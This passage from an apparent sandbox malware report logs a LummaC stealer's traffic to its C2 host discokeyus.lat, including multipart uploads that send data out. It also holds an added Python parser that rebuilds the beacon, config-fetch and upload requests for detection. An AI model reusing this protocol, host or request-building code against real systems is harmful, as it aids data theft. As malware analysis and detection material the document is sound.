    Data Ascii: NjK+MGaVavJ09ZQxazgZ2cLfeBlV6+4aeI9HYiwJ9IZ+NfxzY1YvYPGl0OBpuEhP0s7oCRdt+o5qRUdirwiyVbCmuSMlxi9hYzACY2u7yQ0RHjmb0ivuGfkMwqcviDVF+rQ9cSNUbGAyZ9NxeWsICcLI65FV6Sma/42WIX1N58T9JqjgopZvojIlkeBp+opMkR95GRdpaJp6DsTlbsr0hD+1vrHzhb6jtTYEcWF6yQtCU7talSovCH2eAHavCKf
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 72 49 68 42 6a 30 79 63 75 41 43 64 33 72 33 54 41 30 43 55 37 74 61 6c 53 6f 76 43 48 32 65 41 48 61 76 43 4b 66 54 4c 6a 58 38 38 65 4c 56 37 75 44 77 70 31 44 69 61 50 69 4a 43 31 45 66 2b 35 6f 55 71 57 6e 62 2b 30 2b 45 5a 47 77 4b 4e 38 56 38 70 71 31 67 6f 6c 41 2b 74 47 4d 72 45 36 4a 70 75 4e 6c 43 6b 68 31 34 47 4e 4d 37 37 55 76 38 48 59 66 6c 76 74 32 6e 78 6a 78 32 76 44 49 69 6c 69 39 68 4d 6d 62 54 6f 61 6d 36 79 30 78 54 48 2f 69 62 56 65 70 71 6d 62 74 4d 77 71 66 73 69 4c 54 56 4c 61 61 2f 4e 72 4f 41 50 71 6d 79 34 35 4b 71 71 6a 39 4c 6e 39 55 4e 66 63 6b 58 61 50 71 4f 61 6b 78 48 5a 4b 77 4b 4e 63 55 36 74 2f 31 79 59 39 53 76 49 6a 42 6c 45 2b 46 71 75 77 68 4d 30 74 38 36 58 5a 49 71 71 78 7a 34 33 5a 57 32 72 77 32 6e 30 79 34 37
    Data Ascii: rIhBj0ycuACd3r3TA0CU7talSovCH2eAHavCKfTLjX88eLV7uDwp1DiaPiJC1Ef+5oUqWnb+0+EZGwKN8V8pq1golA+tGMrE6JpuNlCkh14GNM77Uv8HYflvt2nxjx2vDIili9hMmbToam6y0xTH/ibVepqmbtMwqfsiLTVLaa/NrOAPqmy45Kqqj9Ln9UNfckXaPqOakxHZKwKNcU6t/1yY9SvIjBlE+FquwhM0t86XZIqqxz43ZW2rw2n0y47
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 59 75 59 62 46 6c 30 47 4e 70 4f 4d 6a 4d 55 31 39 34 32 46 56 70 62 68 70 35 7a 73 54 6c 62 41 38 33 78 6e 38 31 76 2f 4b 68 56 4c 36 78 34 79 66 55 63 58 7a 72 42 49 79 52 48 76 74 63 68 71 77 35 48 69 70 4d 52 54 61 34 32 37 54 47 76 6a 56 39 38 36 46 55 4c 75 46 77 70 39 4d 6a 4b 50 6b 4e 54 35 50 63 2b 39 71 56 61 36 75 5a 4f 77 79 48 35 36 39 49 5a 39 61 75 4e 33 6a 67 74 59 59 6c 61 37 35 32 6d 69 2f 36 2f 4e 70 4a 67 74 38 34 69 51 43 37 36 5a 69 35 54 34 58 6e 4c 49 69 31 52 33 7a 31 76 44 47 67 6c 47 2f 6a 38 32 64 54 49 53 76 34 43 30 35 53 48 6a 68 61 31 57 6e 36 69 2b 70 4d 51 44 61 34 32 37 36 41 2f 50 55 2f 59 4b 52 46 71 50 4a 79 35 51 4a 33 65 76 67 4c 6a 6c 4e 66 75 4a 6c 58 4b 65 76 61 65 30 33 48 70 79 34 49 64 73 52 2b 64 58 2f 7a 6f
    Data Ascii: YuYbFl0GNpOMjMU1942FVpbhp5zsTlbA83xn81v/KhVL6x4yfUcXzrBIyRHvtchqw5HipMRTa427TGvjV986FULuFwp9MjKPkNT5Pc+9qVa6uZOwyH569IZ9auN3jgtYYla752mi/6/NpJgt84iQC76Zi5T4XnLIi1R3z1vDGglG/j82dTISv4C05SHjha1Wn6i+pMQDa4276A/PU/YKRFqPJy5QJ3evgLjlNfuJlXKevae03Hpy4IdsR+dX/zo
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 7a 5a 56 43 6c 36 7a 6a 49 7a 68 48 66 65 46 69 57 36 71 67 62 65 34 7a 45 35 57 33 62 70 46 55 2f 38 4b 37 6d 73 35 32 73 5a 72 62 6d 30 65 4f 76 66 64 6e 49 41 56 69 72 6d 4e 57 37 2f 49 68 36 6a 30 54 6e 72 73 69 33 78 44 31 32 75 6e 4e 69 56 2b 7a 67 74 36 53 54 6f 4b 67 35 43 77 77 54 57 6e 69 61 6b 69 71 75 48 4f 70 65 46 69 64 6f 32 36 48 56 4d 37 64 36 39 4b 4e 47 6f 75 66 7a 34 35 43 69 4b 65 73 4f 48 46 53 4f 2b 6c 6f 47 76 66 71 5a 2b 59 2f 47 35 57 36 4a 39 4d 5a 2f 64 50 2b 77 34 68 63 73 49 50 4d 6e 6b 2b 45 72 75 59 6b 50 6b 46 79 36 57 78 64 72 4c 67 68 70 33 59 66 67 76 74 32 6e 7a 33 2f 79 50 58 53 7a 6b 66 30 6b 49 79 66 52 63 58 7a 72 43 4d 31 52 48 2f 70 61 46 79 71 72 47 7a 6f 4f 52 6d 61 74 43 72 55 48 66 37 62 39 73 65 44 58 4b 69
    Data Ascii: zZVCl6zjIzhHfeFiW6qgbe4zE5W3bpFU/8K7ms52sZrbm0eOvfdnIAVirmNW7/Ih6j0Tnrsi3xD12unNiV+zgt6SToKg5CwwTWniakiquHOpeFido26HVM7d69KNGoufz45CiKesOHFSO+loGvfqZ+Y/G5W6J9MZ/dP+w4hcsIPMnk+EruYkPkFy6WxdrLghp3Yfgvt2nz3/yPXSzkf0kIyfRcXzrCM1RH/paFyqrGzoORmatCrUHf7b9seDXKi
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 64 33 72 37 43 30 36 51 58 62 74 61 31 6d 39 71 32 66 37 4e 68 57 51 71 53 54 55 45 66 58 58 39 73 47 49 58 72 47 46 33 70 46 4a 68 71 43 73 61 58 39 4d 59 36 34 38 47 6f 79 39 64 2b 4d 78 46 49 79 77 4c 39 77 43 39 63 71 37 6a 4d 35 4a 76 5a 69 4d 77 46 2b 56 76 4f 73 34 63 56 49 37 36 57 67 61 39 2b 70 6e 34 44 41 66 6e 4c 55 38 32 68 4c 33 31 66 4c 4c 69 6c 43 35 69 63 69 63 54 6f 43 6f 34 43 77 34 53 48 54 71 62 56 53 6d 70 53 47 6e 64 68 2b 43 2b 33 61 66 4e 65 50 5a 39 38 2f 4f 52 2f 53 51 6a 4a 39 46 78 66 4f 73 4b 7a 46 4f 65 2b 52 69 58 71 71 73 61 2b 77 32 45 35 6d 30 4b 74 6b 51 39 39 72 77 79 34 39 65 76 34 50 48 6e 6b 53 47 72 65 70 6e 63 51 74 38 39 69 51 43 37 34 70 36 35 44 6f 66 32 71 52 67 78 6c 54 2f 31 72 75 61 7a 6c 4f 32 6a 63 75 59
    Data Ascii: d3r7C06QXbta1m9q2f7NhWQqSTUEfXX9sGIXrGF3pFJhqCsaX9MY648Goy9d+MxFIywL9wC9cq7jM5JvZiMwF+VvOs4cVI76Wga9+pn4DAfnLU82hL31fLLilC5icicToCo4Cw4SHTqbVSmpSGndh+C+3afNePZ98/OR/SQjJ9FxfOsKzFOe+RiXqqsa+w2E5m0KtkQ99rwy49ev4PHnkSGrepncQt89iQC74p65Dof2qRgxlT/1ruazlO2jcuY
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 52 6e 45 45 78 74 37 55 74 5a 76 71 4d 68 70 33 59 66 6a 50 74 32 6e 79 71 34 79 50 6a 53 6a 56 65 72 74 34 7a 41 55 4c 76 72 35 7a 45 34 57 33 6a 34 62 31 65 6a 75 31 2b 70 62 6b 7a 49 36 58 79 4e 52 75 65 61 35 50 33 41 47 4c 76 4a 6c 4b 46 51 78 62 32 73 66 32 30 46 4f 2f 77 6b 41 75 2f 74 59 76 73 6b 48 70 6d 74 4c 5a 67 71 78 76 33 74 79 49 6c 49 76 5a 37 44 32 41 66 46 70 4b 78 2f 42 67 74 79 36 58 39 4c 75 61 64 78 37 6e 59 6e 31 50 73 32 6e 30 79 34 37 2f 6a 4d 67 46 2b 73 6d 49 47 2f 58 34 2b 73 2f 43 41 6f 52 44 75 67 4a 46 7a 76 38 6a 4b 6e 64 68 79 4c 2b 33 61 50 52 71 4f 50 71 4a 58 65 43 71 58 48 31 64 68 66 78 66 4f 2b 61 58 39 5a 4f 37 59 6b 48 61 79 34 63 2b 38 31 44 70 6e 38 45 4f 45 7a 34 74 66 39 31 5a 39 6d 68 49 37 57 6c 55 2b 53 75
    Data Ascii: RnEExt7UtZvqMhp3YfjPt2nyq4yPjSjVert4zAULvr5zE4W3j4b1eju1+pbkzI6XyNRuea5P3AGLvJlKFQxb2sf20FO/wkAu/tYvskHpmtLZgqxv3tyIlIvZ7D2AfFpKx/Bgty6X9Luadx7nYn1Ps2n0y47/jMgF+smIG/X4+s/CAoRDugJFzv8jKndhyL+3aPRqOPqJXeCqXH1dhfxfO+aX9ZO7YkHay4c+81Dpn8EOEz4tf91Z9mhI7WlU+Su
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 61 63 4f 4e 6f 47 75 48 71 5a 36 6c 75 53 4e 54 37 4b 73 35 55 6f 49 71 70 6d 64 73 4c 37 64 6d 65 68 77 65 63 36 2f 70 6e 5a 78 6b 31 72 6e 59 61 39 2b 6f 6d 36 69 51 4b 6e 4c 67 34 33 46 50 47 35 4e 7a 4d 69 56 6d 73 6d 64 75 58 64 37 75 2b 37 79 6b 78 54 47 33 2f 4a 42 54 76 70 53 47 78 44 31 6a 53 2b 78 47 52 56 4f 43 61 6f 34 4b 37 57 37 53 48 79 34 35 59 79 49 7a 69 49 44 35 64 61 2f 6c 72 47 75 48 71 5a 36 6c 75 53 74 54 37 4b 73 35 55 6f 49 71 70 6d 64 73 4c 37 64 6d 65 68 77 65 63 36 2f 70 6e 5a 78 6b 31 72 6e 59 61 39 2b 6f 6d 36 69 51 4b 6e 4c 67 34 33 46 50 47 35 4e 7a 4d 69 56 6d 73 6d 64 75 58 42 71 75 64 7a 52 6b 42 58 6e 6a 67 61 6c 32 35 75 79 47 6e 64 68 66 61 34 78 65 66 58 4c 6a 6c 74 59 4b 57 47 4f 4c 4a 2b 5a 74 48 69 36 7a 36 4e 6e
    Data Ascii: acONoGuHqZ6luSNT7Ks5UoIqpmdsL7dmehwec6/pnZxk1rnYa9+om6iQKnLg43FPG5NzMiVmsmduXd7u+7ykxTG3/JBTvpSGxD1jS+xGRVOCao4K7W7SHy45YyIziID5da/lrGuHqZ6luStT7Ks5UoIqpmdsL7dmehwec6/pnZxk1rnYa9+om6iQKnLg43FPG5NzMiVmsmduXBqudzRkBXnjgal25uyGndhfa4xefXLjltYKWGOLJ+ZtHi6z6Nn
2024-12-18 19:54:19 UTC | 1369 | IN | Data Raw: 49 32 53 52 68 33 50 75 4a 68 76 59 69 69 50 62 41 75 33 5a 36 38 57 77 5a 70 65 62 79 34 68 4b 78 35 72 36 4a 44 39 46 66 4b 34 71 47 72 66 71 4f 61 6b 62 43 70 32 72 4c 5a 39 61 75 4e 61 37 6d 73 35 56 71 49 37 63 6d 77 57 43 73 65 74 6e 49 41 56 69 72 6e 49 61 39 2f 6b 76 71 53 52 59 77 76 74 70 30 52 6e 35 32 66 58 42 6e 45 71 38 69 74 71 62 44 72 75 56 77 54 55 34 57 33 69 73 56 56 65 72 76 48 54 71 4a 68 2b 6b 68 51 50 4e 45 2b 6a 5a 75 65 36 4a 56 62 61 33 38 71 39 59 67 72 75 75 41 54 78 64 65 4b 34 71 47 72 66 71 4f 61 6b 62 43 70 32 72 4c 5a 30 34 2f 39 66 33 67 70 45 57 6f 38 6e 61 32 42 48 57 35 61 77 31 66 78 4d 37 71 57 64 49 76 61 78 69 2f 7a 56 66 70 49 55 44 7a 52 50 6f 32 62 6e 7a 67 31 79 73 6e 4d 2b 49 54 72 75 56 77 54 55 34 57 33 69
    Data Ascii: I2SRh3PuJhvYiiPbAu3Z68WwZpeby4hKx5r6JD9FfK4qGrfqOakbCp2rLZ9auNa7ms5VqI7cmwWCsetnIAVirnIa9/kvqSRYwvtp0Rn52fXBnEq8itqbDruVwTU4W3isVVervHTqJh+khQPNE+jZue6JVba38q9YgruuATxdeK4qGrfqOakbCp2rLZ04/9f3gpEWo8na2BHW5aw1fxM7qWdIvaxi/zVfpIUDzRPo2bnzg1ysnM+ITruVwTU4W3i


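The three sessions above show the LummaC C2 exchange end to end: a liveness POST with `act=life` answered by a chunked `ok`, a `recive_message` POST carrying the build identifier `lid=4h5VfH--` and answered with a large opaque blob, then a `multipart/form-data` upload in which the first fields are `hwid`, `pid` and `lid`. The following parser is an added example and is not part of the Joe Sandbox report or of the sample's own code. It reconstructs the three request shapes from the values captured in the report (host `discokeyus.lat`, path `/api`, the `act` values, `lid`, the multipart boundary `6ZHM4NAAMLP` and the three text fields), labels each with the stage of the protocol it belongs to, and dechunks the `act=life` reply; the constructed upload body stops at the three visible fields because the report truncates the rest of that request.

```python
"""Added example: classify LummaC C2 requests and dechunk C2 replies.

Sample messages are constructed here from values visible in the Joe Sandbox
capture; they are not the report's own data and the upload body is cut down
to the three form fields that the capture shows in full.
"""
import re
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def build_post(host: str, content_type: str, body: bytes) -> bytes:
    """Assemble a POST /api request in the header order the capture shows."""
    head = (f"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: {content_type}\r\nUser-Agent: {UA}\r\n"
            f"Content-Length: {len(body)}\r\nHost: {host}\r\n\r\n")
    return head.encode() + body


BOUNDARY = "6ZHM4NAAMLP"
UPLOAD_FIELDS = (("hwid", "93988A44B20DCE4AAC8923850305D13E"), ("pid", "2"), ("lid", "4h5VfH--"))
UPLOAD_BODY = b"".join(
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'.encode()
    for k, v in UPLOAD_FIELDS) + f"--{BOUNDARY}--\r\n".encode()

# Constructed samples mirroring sessions 0, 1 and 2 of the capture.
LIFE_REQUEST = build_post("discokeyus.lat", "application/x-www-form-urlencoded", b"act=life")
RECV_REQUEST = build_post("discokeyus.lat", "application/x-www-form-urlencoded",
                          b"act=recive_message&ver=4.0&lid=4h5VfH--&j=")
UPLOAD_REQUEST = build_post("discokeyus.lat", f"multipart/form-data; boundary={BOUNDARY}", UPLOAD_BODY)
# Constructed reply to act=life: the chunked body "2\r\nok\r\n0\r\n\r\n" seen in session 0.
LIFE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
                 b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n2\r\nok\r\n0\r\n\r\n")


def parse_http_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 message into (start line, lower-cased header map, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body (hex size line, data, CRLF, ... 0)."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0].decode(), 16)
        if size == 0:
            return bytes(out)
        start = end + 2
        out += body[start:start + size]
        pos = start + size + 2


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} for every form-data part in the body."""
    fields: Dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":        # preamble / closing delimiter
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', part_head)
        if m:
            fields[m.group(1).decode()] = value
    return fields


def classify_lumma_request(raw: bytes) -> Optional[Dict[str, str]]:
    """Map a request to its C2 stage; None if it is not one of the three shapes."""
    start, headers, body = parse_http_message(raw)
    if not start.startswith("POST /api "):
        return None
    host, ctype = headers.get("host", ""), headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body.decode("latin-1"), keep_blank_values=True).items()}
        if form.get("act") not in ("life", "recive_message"):
            return None
        return {"stage": form["act"], "host": host, "lid": form.get("lid", ""), "ver": form.get("ver", "")}
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if ctype.startswith("multipart/form-data") and m:
        fields = parse_multipart(body, m.group(1))
        if {"hwid", "pid", "lid"}.issubset(fields):
            return {"stage": "upload", "host": host, "hwid": fields["hwid"].decode(),
                    "pid": fields["pid"].decode(), "lid": fields["lid"].decode()}
    return None


def c2_reply_body(raw_response: bytes) -> bytes:
    """Return the response body with chunked framing removed."""
    _, headers, body = parse_http_message(raw_response)
    return dechunk(body) if headers.get("transfer-encoding", "").lower() == "chunked" else body


if __name__ == "__main__":
    for req in (LIFE_REQUEST, RECV_REQUEST, UPLOAD_REQUEST):
        print(classify_lumma_request(req))
    print(c2_reply_body(LIFE_RESPONSE))
```

The `lid` value is the field worth keying detections and clustering on: it is sent both in the `recive_message` fetch and in the upload, so it ties a beacon, a config retrieval and an exfiltration to one build even when the C2 host changes. The dechunker matters because the `ok` that confirms a live panel only appears after the `2\r\n...\r\n0\r\n\r\n` framing is stripped.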
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:20 UTC | 273 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6ZHM4NAAMLP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18116
    Host: discokeyus.lat
2024-12-18 19:54:20 UTC | 15331 | OUT | Data Raw: 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 5a 48 4d 34 4e 41 41 4d 4c 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44
    Data Ascii: --6ZHM4NAAMLPContent-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--6ZHM4NAAMLPContent-Disposition: form-data; name="pid"2--6ZHM4NAAMLPContent-Disposition: form-data; name="lid"4h5VfH----6ZHM4NAAMLPContent-D
2024-12-18 19:54:20 UTC | 2785 | OUT | Data Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
    Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
2024-12-18 19:54:22 UTC | 1042 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 19:54:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=e1d366l9tjc779lra9tinmmh4l; expires=Sun, 13-Apr-2025 13:41:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B71XfKRL7WmkuGuePkEOztKK0LrLX%2Bjm8ftIbb6yvSwRYLoBq5%2B6Dp9%2BgBy1tZ4nLBg%2Brm2QK4L1uDwGTyxV2hreoqsv7wisXydKklNo5fb93stmpXJREOb0o3gHUScT8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b447f9ce78d9-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1807&rtt_var=699&sent=15&recv=22&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19069&delivery_rate=1541710&cwnd=32&unsent_bytes=0&cid=12335ae627d80d3b&ts=1920&x=0"
                                                                                              2024-12-18 19:54:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 19:54:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:24 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=V0EFVHPNCHU9SB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8755
Host: discokeyus.lat
2024-12-18 19:54:24 UTC | 8755 | OUT | Data Raw: 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 56 30 45 46 56 48 50 4e 43 48 55 39 53
Data Ascii: --V0EFVHPNCHU9SBContent-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--V0EFVHPNCHU9SBContent-Disposition: form-data; name="pid"2--V0EFVHPNCHU9SBContent-Disposition: form-data; name="lid"4h5VfH----V0EFVHPNCHU9S
2024-12-18 19:54:25 UTC | 1035 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 19:54:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c79pph3s5jar5oqcvjpglufn9r; expires=Sun, 13-Apr-2025 13:41:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MxQjMZ5gjgcwOX22DjmeSRbeBoUUnCl%2BJUE8MDBvZom6wvClx0KTCicEvsMwl3iToddOJ7XgQApkw5pw7pIWktGuLdZPPgUhDqQAlaSzer5rhwGne6m7GnKdEBdGqSv2dw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f41b45d6b867ca5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1976&rtt_var=754&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9688&delivery_rate=1437715&cwnd=243&unsent_bytes=0&cid=acf0ea66f9480a5a&ts=1334&x=0"
2024-12-18 19:54:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 19:54:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:27 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LQV78KY8PLN9TNUXAWQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20438
Host: discokeyus.lat
2024-12-18 19:54:27 UTC | 15331 | OUT | Data Raw: 2d 2d 4c 51 56 37 38 4b 59 38 50 4c 4e 39 54 4e 55 58 41 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 51 56 37 38 4b 59 38 50 4c 4e 39 54 4e 55 58 41 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 51 56 37 38 4b 59 38 50 4c 4e 39 54 4e 55 58 41 57 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a
Data Ascii: --LQV78KY8PLN9TNUXAWQContent-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--LQV78KY8PLN9TNUXAWQContent-Disposition: form-data; name="pid"3--LQV78KY8PLN9TNUXAWQContent-Disposition: form-data; name="lid"4h5VfH--
